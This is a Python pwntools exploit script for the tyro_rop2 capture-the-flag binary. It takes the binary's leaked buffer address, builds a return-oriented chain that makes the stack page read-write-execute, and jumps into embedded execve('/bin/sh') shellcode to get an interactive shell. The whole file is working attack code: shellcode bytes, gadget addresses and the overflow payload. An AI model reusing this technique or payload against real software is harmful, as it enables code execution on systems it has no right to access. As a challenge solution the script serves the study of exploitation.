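#!/usr/bin/env python
"""Exploit script for the tyro_rop2 challenge binary.

The binary prints the address of its 128-byte stack buffer. The script reuses that
leak to build the chain angrop produced: one call that changes the permissions of
the buffer's page (to 7 == RWX, per the original chain), a stack-adjusting gadget
that consumes the three call arguments, and finally a return into the shellcode
stored at the start of the buffer. Everything is assembled as bytes so the script
behaves the same under Python 2 and Python 3 pwntools (mixing str with p32()'s
bytes is a TypeError on Python 3).
"""
from pwn import *
import math

# Change this value if your page size is different (must be a power of two).
PAGE_SIZE = 4096
if PAGE_SIZE & (PAGE_SIZE - 1):
    raise ValueError("PAGE_SIZE must be a power of two")
# Exact log2 for a power of two; int(math.log(x, 2)) can round down for some sizes.
PAGE_SHIFT = PAGE_SIZE.bit_length() - 1

# Offset of the saved return address inside buff[128] ("chain should start 140 in").
CHAIN_OFFSET = 140

# Standard execve("/bin/sh") shellcode, unchanged from the original script.
SHELLCODE = b"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"

# Gadget / call addresses from the angrop chain (non-PIE binary, fixed addresses).
PERM_CHANGE_CALL = 0x8048410  # changes page perms; takes (addr, len, prot) -- presumably mprotect, not named on the page
ADD_ESP_8_POP_EBX_RET = 0x80483e2  # add esp, 8; pop ebx; ret -> skips the three args above
PROT_RWX = 0x7  # read | write | execute


def page_align(addr):
    """Round addr down to the start of its page; the perm-change call needs an aligned address."""
    return (addr >> PAGE_SHIFT) << PAGE_SHIFT


def build_chain(buf):
    """Return the ROP chain (bytes) for a buffer leaked at address buf.

    Layout, one 32-bit little-endian word each:
      PERM_CHANGE_CALL        - make the buffer's page RWX
      ADD_ESP_8_POP_EBX_RET   - return address of that call: pops the 3 args, then ret
      page_align(buf)         - arg 1: page-aligned address to change
      PAGE_SIZE               - arg 2: length
      PROT_RWX                - arg 3: new protection
      buf                     - the gadget's ret lands here: our shellcode
    """
    words = (
        PERM_CHANGE_CALL,
        ADD_ESP_8_POP_EBX_RET,
        page_align(buf),
        PAGE_SIZE,
        PROT_RWX,
        buf,
    )
    return b"".join(p32(w) for w in words)


if len(SHELLCODE) > CHAIN_OFFSET:
    raise ValueError("shellcode does not fit before the return address")

# Interact with the process
p = process("./tyro_rop2_8be61a1002b74b6dd6b0838c7384db84")

# Figure out the buffer address from the binary's own leak line.
p.recvuntil(b"buff[128] is at ")
buf = int(p.recvline().strip(), 16)

# Shellcode first, padding up to the saved return address, then the chain.
exp = SHELLCODE.ljust(CHAIN_OFFSET, b"A") + build_chain(buf)

# Send the exploit (sendline appends the trailing newline the original added by hand).
p.sendline(exp)

# Interact with our shiny new shell
p.interactive()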